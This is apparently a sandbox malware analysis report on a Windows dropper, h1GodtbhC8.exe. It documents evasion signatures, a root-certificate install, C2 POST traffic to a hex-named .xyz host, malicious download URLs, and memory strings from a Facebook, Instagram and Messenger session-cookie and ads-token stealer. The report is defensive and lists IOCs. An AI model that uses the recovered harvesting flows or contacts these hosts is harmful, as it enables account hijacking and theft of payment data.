Analysis Report h1GodtbhC8.exe

Overview

General Information

Sample Name: h1GodtbhC8.exe
Analysis ID: 327203
MD5: 3ca6df4914385efd4ba9cd239b5ed254
SHA1: b66535ff43334177a5a167b9f2b07ade75484eec
SHA256: 0acebaf80946be0cb3099233e8807aa775c8304fc3dee48d42241ff68b7ab318
Tags: exe

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (creates a PE file in dynamic memory)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Binary contains a suspicious time stamp
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to detect sleep reduction / modifications
Contains functionality to infect the boot sector
Hides threads from debuggers
Installs new ROOT certificates
Machine Learning detection for dropped file
Machine Learning detection for sample
May check the online IP address of the machine
PE file has a writeable .text section
Registers a new ROOT certificate
Tries to harvest and steal browser information (history, passwords, etc)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Antivirus or Machine Learning detection for unpacked file
Checks for available system drives (often done to infect USB drives)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locale information (e.g. system language)
Contains functionality to read device registry values (via SetupAPI)
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
File is packed with WinRAR
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Installs a Chrome extension
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains strange resources
Queries device information via Setup API
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara signature match

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: h1GodtbhC8.exe Avira: detected
Antivirus detection for URL or domain
Source: http://www.sodown.xyz/index.exe Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: dream.pics Virustotal: Detection: 9%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\nsqEF29.tmp\Sibuia.dll ReversingLabs: Detection: 17%
Multi AV Scanner detection for submitted file
Source: h1GodtbhC8.exe Virustotal: Detection: 46%
Source: h1GodtbhC8.exe Metadefender: Detection: 16%
Source: h1GodtbhC8.exe ReversingLabs: Detection: 64%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: h1GodtbhC8.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 25.2.1E1C360C582DF797.exe.4330000.4.unpack Avira: Label: TR/Patched.Ren.Gen2
Source: 21.2.1E1C360C582DF797.exe.42a0000.6.unpack Avira: Label: TR/Patched.Ren.Gen2
Source: 4.2.aliens.exe.42c0000.4.unpack Avira: Label: TR/Patched.Ren.Gen2

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_1001F720 CryptStringToBinaryA, CryptStringToBinaryA, CertCreateCertificateContext, CertOpenStore, CertAddCertificateContextToStore, GetLastError, CertGetCertificateContextProperty, _memset, CertGetCertificateContextProperty, _memset, _memset, _sprintf, _sprintf, CertCloseStore, CertFreeCertificateContext, 4_2_1001F720
Despite the signature name, this function does no encryption. The call sequence (CryptStringToBinaryA twice, once for the buffer size and once to base64-decode an embedded certificate; CertCreateCertificateContext; CertOpenStore; CertAddCertificateContextToStore; then CertGetCertificateContextProperty with _sprintf to read back and format a property, typically the thumbprint) is the pattern of a certificate-store install and matches the "Installs new ROOT certificates" / "Registers a new ROOT certificate" signatures above. A trusted root planted this way lets the operator intercept TLS on the host without browser warnings; on a suspect machine, diff the LocalMachine and CurrentUser ROOT stores against a known-good baseline by thumbprint.

Spreading:

Checks for available system drives (often done to infect USB drives)
Source: C:\Windows\SysWOW64\msiexec.exe File opened (one open per drive letter, in this order): z: x: v: t: r: p: n: l: j: h: f: b: y: w: u: s: q: o: m: k: i: g: e: c: a:
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 0_2_00406CC7
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_00406301 FindFirstFileW,FindClose, 0_2_00406301
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_6E660F62 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose, 0_2_6E660F62
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_6E651C23 __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose, 0_2_6E651C23
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_0121A534 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 1_2_0121A534
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_0123A928 FindFirstFileExA, 1_2_0123A928
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_0122B820 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW, 1_2_0122B820
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_00402D09 FindFirstFileA, 4_2_00402D09
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_0040693B DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 4_2_0040693B
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_004066CC FindFirstFileA,FindClose, 4_2_004066CC
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_1001A170 FindFirstFileA,FindClose, 4_2_1001A170
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: 21_2_026DC704 PathFileExistsW,FindFirstFileW,FindClose, 21_2_026DC704
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: 21_2_026E1F70 FindFirstFileW,FindClose,@_RTC_CheckStackVars@8, 21_2_026E1F70
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: 21_2_04FA7950 PathFileExistsA,_memset,_memset,_strcpy_s,_strcat_s,FindFirstFileA,_memset,_strcpy_s,_strcat_s,_strcat_s,_strcat_s,_strcat_s,PathFileExistsA,PathRemoveFileSpecA,_memset,_strlen,FindNextFileA,FindClose, 21_2_04FA7950
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: 21_2_04FA5A90 FindFirstFileA,FindClose, 21_2_04FA5A90

Networking:

May check the online IP address of the machine
Source: unknown DNS query: name: iplogger.org (two queries observed)
Uses ping.exe to check the status of other devices and networks / Uses ping.exe to sleep
Source: unknown Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Pinging loopback three times is not a network check: with a one-second pause between echo requests it is a roughly two-second delay, the classic batch-file sleep, and belongs to the "Uses ping.exe to sleep" signature. The parent is recorded as unknown, so tie this process to the dropper through the process tree when reproducing.
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected:
    GET /info/ddd HTTP/1.1
    Host: EF6DF4AF06BA6896.xyz
    Accept: */*
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: 15 clear-text HTTP requests to ef6df4af06ba6896.xyz, all of one shape (shown once; the per-request differences are tabulated below):
    POST /info/w HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Content-Type: application/x-www-form-urlencoded
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
    upgrade-insecure-requests: 1
    Content-Length: 81
    Host: ef6df4af06ba6896.xyz

    Method  Path       User-Agent claims      Content-Length  Requests
    POST    /info/w    Chrome/83.0.4103.116   93              3
    POST    /info/w    Chrome/86.0.4240.193   81              6
    POST    /info/e    Chrome/86.0.4240.193   677             1
    POST    /info/g    Chrome/86.0.4240.193   1405            1
    POST    /info/du   Chrome/86.0.4240.193   125             1
    GET     /info/r    Chrome/86.0.4240.193   (no body)       2
    GET     /info/ddd  (no User-Agent)        (no body)       1

    The Chrome/83 requests differ from the Chrome/86 ones only in the User-Agent and in an Accept value that ends in "application/signed-exchange;v=b3" without the trailing ";q=0.9". The GET requests carry no Content-Type or Content-Length. The GET /info/ddd request (Host: EF6DF4AF06BA6896.xyz, Accept: */*, nothing else) is the one listed under "HTTP GET or POST without a user agent" above.

The User-Agent is borrowed, not a browser's. A Chrome 83 or 86 navigation request would carry Sec-Fetch-Dest, Sec-Fetch-Mode and Sec-Fetch-Site headers (Chrome has sent them since version 76), would write Upgrade-Insecure-Requests and keep-alive in its own capitalisation, and would not pair a text/html Accept with an 81-byte form-encoded POST; the same ko-KR Accept-Language is sent on every request. The fixed-size /info/w POSTs have the shape of a check-in loop; the one-off larger bodies (/info/e, /info/g, /info/du) are the requests to pull from the pcap for exfiltrated content. The hex-named .xyz host and its /info/ paths, together with dream.pics, iplogger.org and http://www.sodown.xyz/index.exe from the sections above, are the network IOCs to block.
The strings below, recovered from 1E1C360C582DF797.exe process memory, come from a module compiled from .\task_cookie\facebook_agreement.cpp whose [HIJACK][file][function][line] log format survived in the build (which also retains _RTC_CheckStackVars, i.e. MSVC run-time checks, in 21_2_026E1F70 above). They reference reading the Facebook session cookies c_user and xs, pulling fb_dtsg tokens, Ads Manager account IDs and access tokens, stored payment methods and friend counts, walking the page-creation flow (friends2page), obtaining Instagram session IDs and Messenger SSO results through Facebook login, Facebook log-out flows, and the Firefox install directory from the registry. This is the behaviour behind the "Tries to harvest and steal browser information" signature: session-cookie theft, which needs no password.
Source: 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: "name":"fb_dtsg","value":"name="fb_dtsg" value="Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: nonehttps://www.facebook.com/""2%d0https://graph.facebook.com/me/friends?access_token=%s&pretty=1&limit=1summarytotal_count{}summarytotal_count%dquery_friends.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: count = %d equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: -3https://www.facebook.com/payments/settings/payment_methods/index.php?__a=1errorSummaryconfirmemail.phpcard_type_name-110query_payment2.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: ret = %s equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe String found in binary or memory: _time":"13245951499607797","lastpingday":"13245947458072931","location":1,"manifest":{"app":{"launch":{"container":"tab","web_url":"http://www.youtube.com"},"web_content":{"enabled":true,"origin":"http://www.youtube.com"}},"current_locale":"en","default_locale equals www.youtube.com (Youtube)
Source: 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: same-originreferer: https://www.messenger.com/origin: https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie: c_user=ookie: xs=ookie: ;%[^;]; https://m.facebook.com/settings/email/<span class="_52ji _8uk3">accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1</span></span>@&#064;@&#064;https://m.facebook.com/settings/sms/<strong><span dir="ltr">accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1</span></span>+ https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_point"dtsg":{"token":"accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1"https://m.facebook.com/pages/create/edit_name/"draftID":Accept: */*Origin: https://m.facebook.comReferer: https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_pointSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originX-Requested-With: XMLHttpRequestX-Response-Format: JSONStreampage_name=&m_sess=&fb_dtsg=&jazoest=&__csr=&__req=3&__user=,"https://m.facebook.com/pages/creation_flow/?step=category&draft_id=&cat_ref_page_id=0&extra_data=%7B%22page_name%22%3A%22%22%7D"dtsg":{"token":"accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_pointsec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: same-originSec-Fetch-User: ?1upgrade-insecure-requests: 1"https://m.facebook.com/pages/create/edit_category/"pageID":Referer: https://m.facebook.com/pages/creation_flow/?step=category&draft_id=&cat_ref_page_id=0&extra_data=%7B%22page_name%22%3A%22%22%7DAccept: */*Origin: https://m.facebook.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originX-Response-Format: JSONStreamX-Requested-With: XMLHttpRequestpage_category=1300&draft_id=&m_sess=&fb_dtsg=&jazoest=&__csr=&__req=9&__user=}"+ .-_@@friends2page.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: pageid = %s equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: bad allocationSOFTWARE\Mozilla\Mozilla FirefoxCurrentVersion\\MainInstall Directory%s\firefox.exe{}[]"1""2""3"123bad allocationc_user=xs=https://www.facebook.com/adsmanager/manage/adshttps://business.facebook.com/adsmanager/manage/adssettings/?act=&access_token:""access_token":""query_token_account_id.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: c_user=xs=https://www.facebook.com/ads/manager/account_settingsaccountID:"access_token:"Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: none""query_token_account_id_laomaozi.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: c_user=xs=https://www.facebook.com/adsmanager/manage/adshttps://business.facebook.com/adsmanager/manage/adswindow.location.replace("")/act___accessToken="Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: nonehttps:act=/\/"%[0-9]query_token_account_id2.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe String found in binary or memory: http://www.youtube.com equals www.youtube.com (Youtube)
Source: 1E1C360C582DF797.exe, 00000019.00000003.642482203.0000000005C32000.00000004.00000001.sdmp String found in binary or memory: http://www.youtube.com_7 equals www.youtube.com (Youtube)
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: https://www.facebook.com/"name="fb_dtsg" value=""logout_hash":"""logout_hash":"logoutToken:""logoutToken:"https://www.facebook.com/comet/try/source=SETTINGS_MENU&nctr[_mod]=pagelet_bluebar&__user=&__a=1&__csr=&__req=14&__beoa=0&__pc=PHASED%3ADEFAULT&dpr=1&__ccg=EXCELLENT&fb_dtsg=&jazoest=for (;;);{https://m.facebook.com/logout.php?h=%s&t=%sc_user=deleted"encrypted":"https://m.facebook.com/?_rdr""name="fb_dtsg" value="logout.phpm_sess=&fb_dtsg=&jazoest=&__csr=&__req=9&__a=&__user=https://m.facebook.com/bookmarks/flyout/body/?id=u_0_6\https://m.facebook.com/logout.php%sc_user=deletedhttps://m.facebook.com/?soft=bookmarks"logoutURL":"\"logout.phphttps://m.facebook.com&source=mtouch_logout_button&persist_locale=1&button_name=logout&button_location=settings%s equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: https://www.facebook.com/ads/manager/account_settings equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: https://www.facebook.com/adsmanager/manage/ads equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: https://www.facebook.com/bookmarks/pages?ref_type=logout_gear equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: https://www.facebook.com/comet/try/ equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: https://www.facebook.com/connect/ping?client_id=124024574287414&domain=www.instagram.com&origin=1&redirect_uri=https%3A%2F%2Fstaticxx.facebook.com%2Fconnect%2Fxd_arbiter%2Fr%2F1e2RywyANNe.js%3Fversion%3D42%23cb%3Df19f2d8a0dd2f24%26domain%3Dwww.instagram.com%26origin%3Dhttps%253A%252F%252Fwww.instagram.com%252Ff2dc055ae1b1274%26relation%3Dparent&response_type=token%2Csigned_request%2Ccode&sdk=joey&version=v2.2 equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: https://www.facebook.com/connect/ping?client_id=124024574287414&domain=www.instagram.com&origin=1&redirect_uri=https%3A%2F%2Fstaticxx.facebook.com%2Fconnect%2Fxd_arbiter%2Fr%2F1e2RywyANNe.js%3Fversion%3D42%23cb%3Df19f2d8a0dd2f24%26domain%3Dwww.instagram.com%26origin%3Dhttps%253A%252F%252Fwww.instagram.com%252Ff2dc055ae1b1274%26relation%3Dparent&response_type=token%2Csigned_request%2Ccode&sdk=joey&version=v2.2&access_token=&expires_in=Location: query_instagram_cookie.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: token = %s equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: https://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F&state=%7B%22fbLoginKey%22%3A%221l3a6gcoxzmx9bogry41n78unr193ooptzd1bmk8ggfxw5bdph1%22%2C%22fbLoginReturnURL%22%3A%22%2F%22%7D&scope=email&response_type=code%2Cgranted_scopes equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: https://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F&state=%7B%22fbLoginKey%22%3A%221l3a6gcoxzmx9bogry41n78unr193ooptzd1bmk8ggfxw5bdph1%22%2C%22fbLoginReturnURL%22%3A%22%2F%22%7D&scope=email&response_type=code%2Cgranted_scopesLocation: equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: https://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F&state=%7B%22fbLoginKey%22%3A%221l3a6gcoxzmx9bogry41n78unr193ooptzd1bmk8ggfxw5bdph1%22%2C%22fbLoginReturnURL%22%3A%22%2F%22%7D&scope=email&response_type=code%2Cgranted_scopesocation: equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: https://www.facebook.com/login/async_sso/messenger_dot_com/?__a=1 equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: https://www.facebook.com/login/async_sso/messenger_dot_com/?__a=1x-auth-result: query_mess_cookie.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: x_auth_result = %s equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: https://www.facebook.com/payments/settings/payment_methods/index.php?__a=1 equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: https://www.facebook.com/x/oauth/status?client_id=124024574287414&input_token&origin=1&redirect_uri= equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: https://www.facebook.com/x/oauth/status?client_id=124024574287414&input_token&origin=1&redirect_uri=origin: https://www.instagram.comsec-fetch-mode: corsreferer: https://www.instagram.com/sec-fetch-site: cross-sitefb-ar: equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: https://www.instagram.com/accounts/login/ajax/facebook/ equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: x-csrftoken: xhttps://www.instagram.com/accounts/login/ajax/facebook/"userId": "sessionid="";sessionid=;query_instagram_cookie.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: sessionid = %s equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: x-csrftoken: xhttps://www.instagram.com/accounts/login/ajax/facebook/"userId": "sessionid="";sessionid=;query_instagram_cookie_20191224.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: sessionid = %s equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: x-csrftoken: xhttps://www.instagram.com/accounts/login/ajax/facebook/"userId": "sessionid="";sessionid=;query_instagram_cookie_20200229.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: sessionid = %s equals www.facebook.com (Facebook)
Source: unknown DNS traffic detected: queries for: ef6df4af06ba6896.xyz
Source: unknown HTTP traffic detected: POST /info/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36upgrade-insecure-requests: 1Content-Length: 93Host: ef6df4af06ba6896.xyz
Source: 1E1C360C582DF797.exe, 00000015.00000002.827073062.0000000004157000.00000004.00000040.sdmp String found in binary or memory: http://EF6DF4AF06BA6896.xyz/
Source: 1E1C360C582DF797.exe, 00000015.00000002.827073062.0000000004157000.00000004.00000040.sdmp String found in binary or memory: http://EF6DF4AF06BA6896.xyz//
Source: 1E1C360C582DF797.exe, 00000015.00000002.826367986.0000000002553000.00000004.00000020.sdmp String found in binary or memory: http://EF6DF4AF06BA6896.xyz/0
Source: 1E1C360C582DF797.exe, 00000015.00000002.826367986.0000000002553000.00000004.00000020.sdmp String found in binary or memory: http://EF6DF4AF06BA6896.xyz/;
Source: 1E1C360C582DF797.exe, 00000015.00000002.826367986.0000000002553000.00000004.00000020.sdmp String found in binary or memory: http://EF6DF4AF06BA6896.xyz/dbo
Source: 1E1C360C582DF797.exe, 00000015.00000002.827057199.0000000004150000.00000004.00000040.sdmp String found in binary or memory: http://EF6DF4AF06BA6896.xyz/info/ddd
Source: 1E1C360C582DF797.exe, 00000015.00000002.827057199.0000000004150000.00000004.00000040.sdmp String found in binary or memory: http://EF6DF4AF06BA6896.xyz/info/dddi_u
Source: 1E1C360C582DF797.exe, 00000015.00000002.827073062.0000000004157000.00000004.00000040.sdmp, 1E1C360C582DF797.exe, 00000015.00000002.826367986.0000000002553000.00000004.00000020.sdmp String found in binary or memory: http://EF6DF4AF06BA6896.xyz/info/du
Source: 1E1C360C582DF797.exe, 00000015.00000002.827073062.0000000004157000.00000004.00000040.sdmp String found in binary or memory: http://EF6DF4AF06BA6896.xyz/info/duer3xP
